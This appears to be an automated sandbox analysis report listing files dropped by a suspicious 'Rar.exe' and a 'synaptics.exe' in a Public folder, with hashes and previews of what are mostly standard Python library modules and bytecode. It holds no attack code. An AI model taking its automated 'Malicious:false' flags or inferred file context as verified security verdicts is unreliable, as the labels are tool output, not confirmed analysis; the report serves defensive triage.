                                                                                                                                                                                      Preview:"""An extensible library for opening URLs using a variety of protocols....The simplest way to use this module is to call the urlopen function,..which accepts a string containing a URL or a Request object (described..below). It opens the URL and returns the results as file-like..object; the returned object has some extra methods described below.....The OpenerDirector manages a collection of Handler objects that do..all the actual work. Each Handler implements a particular protocol or..option. The OpenerDirector is a composite object that invokes the..Handlers needed to open the requested URL. For example, the..HTTPHandler performs HTTP GET and POST requests and deals with..non-error returns. The HTTPRedirectHandler automatically deals with..HTTP 301, 302, 303 and 307 redirect errors, and the HTTPDigestAuthHandler..deals with digest authentication.....urlopen(url, data=None) -- Basic usage is the same as original..urllib. pass the url and optionally data to post to an HTTP URL, and
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2445
                                                                                                                                                                                      Entropy (8bit):4.431974454129167
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:r4BbvTGvQS07lPgWWdq9tsrdyW19ej5wkwBkvR:MBzaQS07lY5cjtWywkwBkZ
                                                                                                                                                                                      MD5:D531F0A30312F650F962EAA31652AEBB
                                                                                                                                                                                      SHA1:A565B2AB6F6A05F0681B62B5E2E77B9BC25D3683
                                                                                                                                                                                      SHA-256:3B79834FB777BCC3601B05C8A2BBFAB1A72BF99B10E5A5D2C20A7C3A4583D0CF
                                                                                                                                                                                      SHA-512:25BBA9683CC29296DD103473FBDC24CF7037FCC9736494DA749B3BB9A4189B108B2CDC586AEB923BF2B48D147FFBB306D073F2A1BB1430599B8AE74F6CB629E6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Response classes used by urllib.....The base class, addbase, defines a minimal file-like interface,..including read() and readline(). The typical response object is an..addinfourl instance, which defines an info() method that returns..headers and a geturl() method that returns the url..."""....import tempfile....__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']......class addbase(tempfile._TemporaryFileWrapper):.. """Base class for addinfo and addclosehook. Is a good idea for garbage collection.""".... # XXX Add a method to expose the timeout on the underlying socket?.... def __init__(self, fp):.. super(addbase, self).__init__(fp, '<urllib response>', delete=False).. # Keep reference around as this was part of the original API... self.fp = fp.... def __repr__(self):.. return '<%s at %r whose fp = %r>' % (self.__class__.__name__,.. id(self), self.file).... def __enter__(self):..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9697
                                                                                                                                                                                      Entropy (8bit):4.15994740890475
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:LEvpw5Ct9tcVd/2/paTJqSXkkOFGAiRiH57f/ivoiqN9/qVRjmGSEBaL/KK8Wh/R:46Ct9tcVFTJqF7fOQoVVB0GK8WP3
                                                                                                                                                                                      MD5:A024DF2786691CF05997954F37178BE0
                                                                                                                                                                                      SHA1:617ACE96E03067AD58490972A1E2122885C19813
                                                                                                                                                                                      SHA-256:05CED87A4F681014F6A5BF7370680CDCE02B392A559832CB6D2AA2F910F7D5EB
                                                                                                                                                                                      SHA-512:FA3406801D1D39B9BFCF052A473F297E2782F19F18A5C24139E94088F5AAABC15D1EFE7269E4E7426E13DD4DA0BC92F0A9C661B3325CEE171E3C910EA6820793
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" robotparser.py.... Copyright (C) 2000 Bastian Kleineidam.... You can choose between two licenses when using this package:.. 1) GNU GPLv2.. 2) PSF license for Python 2.2.... The robots.txt Exclusion Protocol is implemented as specified in.. http://www.robotstxt.org/norobots-rfc.txt.."""....import collections..import urllib.parse..import urllib.request....__all__ = ["RobotFileParser"]....RequestRate = collections.namedtuple("RequestRate", "requests seconds")......class RobotFileParser:.. """ This class provides a set of methods to read, parse and answer.. questions about a single robots.txt file..... """.... def __init__(self, url=''):.. self.entries = [].. self.sitemaps = [].. self.default_entry = None.. self.disallow_all = False.. self.allow_all = False.. self.set_url(url).. self.last_checked = 0.... def mtime(self):.. """Returns the time the robots.txt file was last fetched..... This i
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7165
                                                                                                                                                                                      Entropy (8bit):4.635646219278868
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:IqFD4C1j1e5e65PARhQ3E2Q/N56npYv9EVBDgcDrkONFhnlO7c0pz:1zj1Qe8PARQEH/6nSVEVve7c0pz
                                                                                                                                                                                      MD5:CDE9C803E2AC98627170F6CDD8030520
                                                                                                                                                                                      SHA1:5AF6EC7A8B5D787F56FCE7B01F9D103B5D22C3A5
                                                                                                                                                                                      SHA-256:35CD5F9AB4611102799F21E7EFFA5F31EFEE56826E0383F59BAFD27BB3598B9A
                                                                                                                                                                                      SHA-512:942A451A97BD6099C2608685E2097588527627FB1825127E622BA8359E1C104205F89036118241DFB44309077DFE818D703F91116D537A235AFD0B04F3C92D0F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3....# Copyright 1994 by Lance Ellinghouse..# Cathedral City, userfornia Republic, United States of America...# All Rights Reserved..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Lance Ellinghouse..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# LANCE ELLINGHOUSE DISCLAIMS ALL WARRANTIES WITH REGARD TO..# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND..# FITNESS, IN NO EVENT SHALL LANCE ELLINGHOUSE CENTRUM BE LIABLE..# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28233
                                                                                                                                                                                      Entropy (8bit):4.867217589417424
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:hq/jU0Qc7Ad2XLCqXcppi4D9rGcMyiNB/2TFbVjjh5:hq/I0QcUcX+qXcppi7Ijh5
                                                                                                                                                                                      MD5:ECA958D6B61E6FA8319F071C7D3CA253
                                                                                                                                                                                      SHA1:657398649832132808FD5DDB3B05240525758535
                                                                                                                                                                                      SHA-256:AC5DD1BFF2AC117CF1D1A9F86131D2E93C935CA59CF0A89D6ABB05295EDF007B
                                                                                                                                                                                      SHA-512:D856FBADF451F3C6126F6EC65CFBD31A240496EFA88E77FCEB4298618F8192A07523C9360225C48404EDF12E6E71EA0C54B96AB7A9844AB51AB3C23D35D74B73
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""UUID objects (universally unique identifiers) according to RFC 4122.....This module provides immutable UUID objects (class UUID) and the functions..uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5..UUIDs as specified in RFC 4122.....If all you want is a unique ID, you should probably call uuid1() or uuid4()...Note that uuid1() may compromise privacy since it creates a UUID containing..the computer's network address. uuid4() creates a random UUID.....Typical usage:.... >>> import uuid.... # make a UUID based on the host ID and current time.. >>> uuid.uuid1() # doctest: +SKIP.. UUID('a8098c1a-f86e-11da-bd1a-00112444be1e').... # make a UUID using an MD5 hash of a namespace UUID and a name.. >>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org').. UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e').... # make a random UUID.. >>> uuid.uuid4() # doctest: +SKIP.. UUID('16fd2706-8baf-433b-82eb-8c7fada847da').... # make a UUID using a SHA-1
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20237
                                                                                                                                                                                      Entropy (8bit):4.456113748681824
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:VIGjFGnRqmpRXDeU+e6TNkedNr/vFx0BWSvs31I:VI4GnRqm2xtOBDs31I
                                                                                                                                                                                      MD5:75CDCBE366D13B7C463830D8FAF2DBE5
                                                                                                                                                                                      SHA1:BBAA1236B789B5D2511A938A604361E32AEA6D6F
                                                                                                                                                                                      SHA-256:2B0C512178EAF53227CD7D336FBC5E055509048B8E1D9CE7CBB33D56B968D4BA
                                                                                                                                                                                      SHA-512:E9B77E373F793355BA7822C39D141054B13772D4C2124E95CB8E9FFBC684D9AB2107FFDB5C9C8009E4541CD4F1169D3AEF825AB398FB73151BA60D05963EA045
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python part of the warnings subsystem."""....import sys......__all__ = ["warn", "warn_explicit", "showwarning",.. "formatwarning", "filterwarnings", "simplefilter",.. "resetwarnings", "catch_warnings"]....def showwarning(message, category, filename, lineno, file=None, line=None):.. """Hook to write a warning to a file; replace if you like.""".. msg = WarningMessage(message, category, filename, lineno, file, line).. _showwarnmsg_impl(msg)....def formatwarning(message, category, filename, lineno, line=None):.. """Function to format a warning the standard way.""".. msg = WarningMessage(message, category, filename, lineno, None, line).. return _formatwarnmsg_impl(msg)....def _showwarnmsg_impl(msg):.. file = msg.file.. if file is None:.. file = sys.stderr.. if file is None:.. # sys.stderr is None when run with pythonw.exe:.. # warnings get lost.. return.. text = _formatwarnmsg(msg).. try:..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18517
                                                                                                                                                                                      Entropy (8bit):4.368436724087491
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:l9EqMa1yctYScMTScRDpMZNCLSz7aYWTRhbtsKeU0hgIidMOhK58v36W1:lHM8ycyStUILSz7aYWTRhbtss0h9631
                                                                                                                                                                                      MD5:D55129AF4810C592A87D75480D44C73F
                                                                                                                                                                                      SHA1:A15D2AD39D8264C6851C5445CE08FC7A03B4426C
                                                                                                                                                                                      SHA-256:0CC87A2E89B8B3AF9470A8EF92944EDEFD4A05E1D9ADEA6F2326F9C8E0AE78FC
                                                                                                                                                                                      SHA-512:89B648FAB150243609A06722574434B09280941DF74845CE3B4A730A1EA55313565E32B4D439BD16B41EC272505C87C025CEBEA60026682720964790658E911D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Stuff to parse WAVE files.....Usage.....Reading WAVE files:.. f = wave.open(file, 'r')..where file is either the name of a file or an open file pointer...The open file pointer must have methods read(), seek(), and close()...When the setpos() and rewind() methods are not used, the seek()..method is not necessary.....This returns an instance of a class with the following public methods:.. getnchannels() -- returns number of audio channels (1 for.. mono, 2 for stereo).. getsampwidth() -- returns sample width in bytes.. getframerate() -- returns sampling frequency.. getnframes() -- returns number of audio frames.. getcomptype() -- returns compression type ('NONE' for linear samples).. getcompname() -- returns human-readable version of.. compression type ('not compressed' linear samples).. getparams() -- returns a namedtuple consisting of all of the.. above in th
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22235
                                                                                                                                                                                      Entropy (8bit):4.290222224385809
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:eJT8HzCblJPEwGmyZVPjY8c4jDyCYAym+TiH9QHORqQeIXjWi86wow0wHRegJn9d:aVEPOpRUBzSmOjJnCoWaDf3DjJnRKs
                                                                                                                                                                                      MD5:77D4C5645BC5F43355F2490B0DB5330D
                                                                                                                                                                                      SHA1:C1D67552A3A49361A322BFCF9E4A925DE3E7AB57
                                                                                                                                                                                      SHA-256:666C9958ACF3D1A307170E7E6DF53BB064C63EA4995627E870552EFA088D9A9D
                                                                                                                                                                                      SHA-512:5A4F5864BA0813736B171CF90B90F971455D53236EE0324578CBE211BFCCB30EED11334B388C5D7D6B412D6ED25694F56948E31F440B4FDFF0C1FA76CDD5D38F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Weak reference support for Python.....This module is an implementation of PEP 205:....https://www.python.org/dev/peps/pep-0205/.."""....# Naming convention: Variables named "wr" are weak reference objects;..# they are called this instead of "ref" to avoid name collisions with..# the module-global ref() function imported from _weakref.....from _weakref import (.. getweakrefcount,.. getweakrefs,.. ref,.. proxy,.. CallableProxyType,.. ProxyType,.. ReferenceType,.. _remove_dead_weakref)....from _weakrefset import WeakSet, _IterationGuard....import _collections_abc # Import after _weakref to avoid circular import...import sys..import itertools....ProxyTypes = (ProxyType, CallableProxyType)....__all__ = ["ref", "proxy", "getweakrefcount", "getweakrefs",.. "WeakKeyDictionary", "ReferenceType", "ProxyType",.. "CallableProxyType", "ProxyTypes", "WeakValueDictionary",.. "WeakSet", "WeakMethod", "finalize"]......_collections_abc.Se
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24962
                                                                                                                                                                                      Entropy (8bit):4.4821654414982
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Dw+gtAvw1CThtWcOGsmCZXt11GhVqbzkeZEyF:DwXyhccVCZXiDO
                                                                                                                                                                                      MD5:C6235576ACFA074E0602F8286D6AE967
                                                                                                                                                                                      SHA1:E7D5740885F262528495F54F1C29E991C4C878E7
                                                                                                                                                                                      SHA-256:91DE52B10A90BC40792725B914E2184671E2E2EE0D32E3BA6B1EC027E63BDC51
                                                                                                                                                                                      SHA-512:1446B528F4A41C4ABC1E532F408CCDA8F4530C37E711E12A80E2141BBEEF4A98A5740EF4B759AFCCFDBD18A2D9FEC7A5A08F0BD87424EB084CF8AF6508A22BE4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3.."""Interfaces for launching and remotely controlling web browsers."""..# Maintained by Georg Brandl.....import os..import shlex..import shutil..import sys..import subprocess..import threading....__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]....class Error(Exception):.. pass...._lock = threading.RLock().._browsers = {} # Dictionary of available browser controllers.._tryorder = None # Preference order of available browsers.._os_preferred_browser = None # The preferred browser....def register(name, klass, instance=None, *, preferred=False):.. """Register a browser connector.""".. with _lock:.. if _tryorder is None:.. register_standard_browsers().. _browsers[name.lower()] = [klass, instance].... # Preferred browsers go to the front of the list... # Need to match to the default browser returned by xdg-settings, which.. # may be of the form e.g. "fir
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6154
                                                                                                                                                                                      Entropy (8bit):4.544312365119713
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:l3vVO5EFsFUxepdMJhp1ygk+3PGo7YytCl:l3ujSg0w6GMYywl
                                                                                                                                                                                      MD5:AB44399A4ABB9874B0F2C2D5F9FEA306
                                                                                                                                                                                      SHA1:0E1F67F497D7E3A497A6EBD8ED6DBAEE11A83656
                                                                                                                                                                                      SHA-256:A9043DAD797D72C31A4A01AD4069D83AC894720EF8E72490831676A8517D0853
                                                                                                                                                                                      SHA-512:1B905F86AF613D9AF99E2046AA82EB2C1271C7E2384DF010DBCFEC37736C2CC2592956CEB08DF567FA3CDA12B8135C55E75081727EA258921E4F8FCA6AC6C6EB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Implements (a subset of) Sun XDR -- eXternal Data Representation.....See: RFC 1014...."""....import struct..from io import BytesIO..from functools import wraps....__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]....# exceptions..class Error(Exception):.. """Exception class for this module. Use:.... except xdrlib.Error as var:.. # var has the Error instance for the exception.... Public ivars:.. msg -- contains the message.... """.. def __init__(self, msg):.. self.msg = msg.. def __repr__(self):.. return repr(self.msg).. def __str__(self):.. return str(self.msg)......class ConversionError(Error):.. pass....def raise_conversion_error(function):.. """ Wrap any raised struct.errors in a ConversionError. """.... @wraps(function).. def result(self, value):.. try:.. return function(self, value).. except struct.error as e:.. raise ConversionError(e.args[0]) from None.. retur
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7741
                                                                                                                                                                                      Entropy (8bit):4.6850395961561775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ocnKpf1Jnkgp9Gw06hznakQ+czXoC/KkWb2z7rKUK4mSaY9wRnKwfRuPKJaR0:ocR6VncLoC/Kk22z7P5Z0RFfO0
                                                                                                                                                                                      MD5:A981793A5C496164DFB5AFC8212CCABE
                                                                                                                                                                                      SHA1:D4309C07CFE248A9725290922937F21363550AE4
                                                                                                                                                                                      SHA-256:EF6D063E7337F6D83FBBB4CA3ADAF321B35CBB3AF736A25D2D637231346E3117
                                                                                                                                                                                      SHA-512:010D2A3AC76A022165E4564CF9A26A3B3324E8585CCCA1C66EE173A4C6A105993FA55B93576B0C48B271C182AC9CE87BD3CE7441CD76E2B19DE0C1907147379D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import contextlib..import os..import pathlib..import shutil..import stat..import sys..import zipfile....__all__ = ['ZipAppError', 'create_archive', 'get_interpreter']......# The __main__.py used if the users specifies "-m module:fn"...# Note that this will always be written as UTF-8 (module and..# function names can be non-ASCII in Python 3)...# We add a coding cookie even though UTF-8 is the default in Python 3..# because the resulting archive may be intended to be run under Python 2...MAIN_TEMPLATE = """\..# -*- coding: utf-8 -*-..import {module}..{module}.{fn}().."""......# The Windows launcher defaults to UTF-8 when parsing shebang lines if the..# file has no BOM. So use UTF-8 on Windows...# On Unix, use the filesystem encoding...if sys.platform.startswith('win'):.. shebang_encoding = 'utf-8'..else:.. shebang_encoding = sys.getfilesystemencoding()......class ZipAppError(ValueError):.. pass......@contextlib.contextmanager..def _maybe_open(archive, mode):.. if isinstance(
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):91926
                                                                                                                                                                                      Entropy (8bit):4.530877476231924
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:A6wB2cR7Tt7+IQOU+OnDKHnCrYYs+NocBa0q8Y:A6Ud+I9U+OnDKHCrRO8Y
                                                                                                                                                                                      MD5:5AB203B50E60C14191FC1EED8A6DC2F9
                                                                                                                                                                                      SHA1:44C4518C0971E7858CA45F50347820177964971E
                                                                                                                                                                                      SHA-256:2E155CDE604896D9903A4C529B89FA768E75F6E17FB7A60DB0AC2190B0B34456
                                                                                                                                                                                      SHA-512:A7ED4066F7FA40161E34B390C62FC9AB7B4E2EC784A9AF96C7A10F32C5D01419B5134C8639EDD1858D9C4876A2752A1863DC798BD9011ED04D6E3983263C0A4A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Read and write ZIP files.....XXX references to utf-8 need further investigation..."""..import binascii..import importlib.util..import io..import itertools..import os..import posixpath..import shutil..import stat..import struct..import sys..import threading..import time..import contextlib..import pathlib....try:.. import zlib # We may need its compression method.. crc32 = zlib.crc32..except ImportError:.. zlib = None.. crc32 = binascii.crc32....try:.. import bz2 # We may need its compression method..except ImportError:.. bz2 = None....try:.. import lzma # We may need its compression method..except ImportError:.. lzma = None....__all__ = ["BadZipFile", "BadZipfile", "error",.. "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",.. "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile",.. "Path"]....class BadZipFile(Exception):.. pass......class LargeZipFile(Exception):.. """.. Raised when writing a zipfile, th
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31670
                                                                                                                                                                                      Entropy (8bit):4.640811570675585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:lO/4o/ka5N9a5LL5pEveF+SS6s5Ag0k6BX8BpL:lOZ/XugefS6aAg04
                                                                                                                                                                                      MD5:C35072F99E2CD83443AC1DB234B1716D
                                                                                                                                                                                      SHA1:68DD726663BBE88215BFC5BF122FB82B7DE83592
                                                                                                                                                                                      SHA-256:52580EB9D1D0607A5139EA2E6EC847CFB5DA30C37F1462E5072C960287A547E2
                                                                                                                                                                                      SHA-512:BAD94CDC61C314DDF965C07A98304ACED800FFFA3BA5E10E32650CB026F8BDCF1F2B9A064A2C319AF7DCF3C25C09018663ABD136E16256F6736E991243636B37
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""zipimport provides support for importing Python modules from Zip archives.....This module exports three objects:..- zipimporter: a class; its constructor takes a path to a Zip archive...- ZipImportError: exception raised by zipimporter objects. It's a.. subclass of ImportError, so it can be caught as ImportError, too...- _zip_directory_cache: a dict, mapping archive paths to zip directory.. info dicts, as used in zipimporter._files.....It is usually not needed to use the zipimport module explicitly; it is..used by the builtin import mechanism for sys.path items that are paths..to Zip archives..."""....#from importlib import _bootstrap_external..#from importlib import _bootstrap # for _verbose_message..import _frozen_importlib_external as _bootstrap_external..from _frozen_importlib_external import _unpack_uint16, _unpack_uint32..import _frozen_importlib as _bootstrap # for _verbose_message..import _imp # for check_hash_based_pycs..import _io # for open..import marshal # for lo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4144
                                                                                                                                                                                      Entropy (8bit):5.361852365766103
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:zgdNzUuGd+P2sKNUWAom2j8kQAnPPELBG0uY:q4BRRAom1gPG00uY
                                                                                                                                                                                      MD5:238CAB637058DFE2CD240BC466A24952
                                                                                                                                                                                      SHA1:99D9E8F59DD7F21F3EEEA38E8B97E1A892317B76
                                                                                                                                                                                      SHA-256:1C6A7F6DD67BCDAD253CA16589BEAD5D3A8BB046379F2DB0C23018E4A5277A17
                                                                                                                                                                                      SHA-512:329A1ADF8E63FE143F0D9D3D021AA327E20BB3E142C2FA38DCCB3C743AB6C0BB6FDEC2C638E1C56E194087B59441DAF911067276D6FBEFDBD1D524D7AFE977A8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):32938
                                                                                                                                                                                      Entropy (8bit):5.035332633387824
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:WpD08l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:uFl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                      MD5:B3C01D3CB0E0126489088960DB293F5A
                                                                                                                                                                                      SHA1:F26F268B6A304129B01D4D4A43815D5EC49FE125
                                                                                                                                                                                      SHA-256:3950BE0C845DB61A814A23F940726C6F2CE7266497FD843EA3E68AD2E4ED9EF1
                                                                                                                                                                                      SHA-512:E18C763B95EFC56DEFFC3B94039B766D39B54E60B0B56260CA5BCEA19C5EC2D3E9297A732390FAB67FBDC0C5894AC7947CCA47960C011927F8FE1C1B8C264C4A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4525
                                                                                                                                                                                      Entropy (8bit):5.143682408486357
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:inAZIr5Fc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:iNvByEeIOQCxNWQRqOT0f
                                                                                                                                                                                      MD5:927EEB6AFD37AD56BD9F4A90AE269759
                                                                                                                                                                                      SHA1:1D9F7E3D18183587DB01F03805183FFAAB141A4A
                                                                                                                                                                                      SHA-256:4288B1098DCB7B0277D84132A5E7C0DE40AB70E9B7437F4668A0E4F8A57CB02D
                                                                                                                                                                                      SHA-512:67F6187C24EE6197637CB3FFA1A40D6D331A1C913F881943829C279CE47CBBAC33F8E1907DCADAB9DA250D4EDA8E367434EE90FFAD5A2AC38DEF6963E5795D93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
